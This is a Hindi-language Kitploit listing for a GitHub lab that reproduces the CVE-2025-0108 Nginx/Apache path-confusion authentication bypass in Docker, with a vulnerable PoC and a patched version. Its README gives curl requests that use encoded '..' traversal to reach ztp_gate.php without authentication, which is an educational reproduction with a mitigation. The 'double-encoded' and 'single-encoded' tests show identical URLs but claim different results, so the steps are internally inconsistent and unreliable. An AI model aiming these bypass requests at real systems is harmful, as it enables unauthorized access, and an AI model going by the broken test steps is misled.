Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-0108 — CVE-2025-0108 पथ भ्रम भेद्यता को Nginx/Apache स्टैक में पुनरुत्पादित करता है। इसमें एक संवेदनशील PoC और एक पैच किया गया कार्यान्वयन शामिल है जो दोहरे-एन्कोडेड प्रमाणीकरण बाईपास के विरुद्ध बैकएंड-साइड शमन प्रदर्शित करता है। | Kitploit
उपकरण/GitHubGitHub/kso4more/cve-2025-0108
भेद्यता विश्लेषणवेब एप्लिकेशन शोषणप्रमाणीकरणगलत कॉन्फ़िगरेशनलर्निंग और शिक्षालैब और अभ्यास
GitHubkso4more/cve-2025-0108

CVE-2025-0108

CVE-2025-0108 पथ भ्रम भेद्यता को Nginx/Apache स्टैक में पुनरुत्पादित करता है। इसमें एक संवेदनशील PoC और एक पैच किया गया कार्यान्वयन शामिल है जो दोहरे-एन्कोडेड प्रमाणीकरण बाईपास के विरुद्ध बैकएंड-साइड शमन प्रदर्शित करता है।

रिपॉजिटरी देखें
255 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-0108 — वेबसुरक्षा (PoC और फिक्स)

इस भंडार में CVE-2025-0108 समस्या (Nginx और Apache के बीच पथ भ्रम / हेडर तस्करी) को पुनः उत्पन्न करने और कम करने के लिए एक छोटा प्रयोगशाला वातावरण शामिल है।
कार्य का उद्देश्य यह प्रदर्शित करना है कि दोहरे-एन्कोडेड अनुरोध कैसे बहु-परत स्टैक (Nginx -> Flask बैकएंड -> Apache/PHP) में प्रमाणीकरण को बायपास कर सकते हैं और बैकएंड-साइड शमन दिखाना है।

यह वातावरण केवल शैक्षिक उद्देश्यों के लिए है।

विषय सूची

  • CVE-2025-0108/ — कमजोर कार्यान्वयन (PoC)
  • CVE-2025-0108_fix/ — पैच किया गया कार्यान्वयन (बैकएंड डिकोडेड पथ की जाँच करता है)

PoC (कमजोर) — CVE-2025-0108

उद्देश्य

उस कमजोर सेटअप का अनुकरण करें जहां परतों के बीच असंगत पथ डिकोडिंग के कारण दोहरा-एन्कोडेड पथ प्रमाणीकरण को बायपास कर सकता है।

वातावरण प्रारंभ करें

CVE-2025-0108 निर्देशिका से:

root@kitploit:~
cd CVE-2025-0108
docker compose up --build

परीक्षण

अपने होस्ट से ये curl कमांड चलाएँ:

परीक्षण 1 — दोहरा-एन्कोडेड (अपेक्षित: HTTP 200)

root@kitploit:~
curl -i "http://127.0.0.1:8085/unauth/%2e%2e/php/ztp_gate.php/PAN_help/x.css"

परीक्षण 2 — एकल-एन्कोडेड (अपेक्षित: HTTP 401)

root@kitploit:~
curl -i "http://127.0.0.1:8085/unauth/%2e%2e/php/ztp_gate.php/PAN_help/x.css"

परीक्षण 3 — .. के साथ कच्चा पथ (अपेक्षित: HTTP 401)

root@kitploit:~
curl -i "http://127.0.0.1:8085/unauth/../php/ztp_gate.php/PAN_help/x.css"

वातावरण बंद करें:

root@kitploit:~
docker compose down

फिक्स संस्करण — CVE-2025-0108_fix

बैकएंड एक्सेस की अनुमति देने से पहले डिकोडेड पथ पर एक अतिरिक्त जांच करता है। यह अनुरोधों के दोहरा-एन्कोडेड होने पर प्रमाणीकरण बायपास को रोकता है।

CVE-2025-0108 निर्देशिका से:

root@kitploit:~
cd CVE-2025-0108
docker compose up --build

परीक्षण

अपने होस्ट से ये curl कमांड चलाएँ:

CVE-2025-0108_fix निर्देशिका से:

root@kitploit:~
cd CVE-2025-0108_fix
docker compose up --build

परीक्षण 1 — दोहरा-एन्कोडेड (अपेक्षित: HTTP 401)

root@kitploit:~
curl -i "http://127.0.0.1:8085/unauth/%2e%2e/php/ztp_gate.php/PAN_help/x.css"

फिक्स बैकएंड डिकोडेड .. का पता लगाता है और 401 अनधिकृत लौटाता है।

परीक्षण 2 — एकल-एन्कोडेड (अपेक्षित: HTTP 401)

root@kitploit:~
curl -i "http://127.0.0.1:8085/unauth/%2e%2e/php/ztp_gate.php/PAN_help/x.css"

परीक्षण 3 — .. के साथ कच्चा पथ (अपेक्षित: HTTP 401)

root@kitploit:~
curl -i "http://127.0.0.1:8085/unauth/../php/ztp_gate.php/PAN_help/x.css"

वातावरण बंद करें:

root@kitploit:~
docker compose down
टूल डाउनलोड करें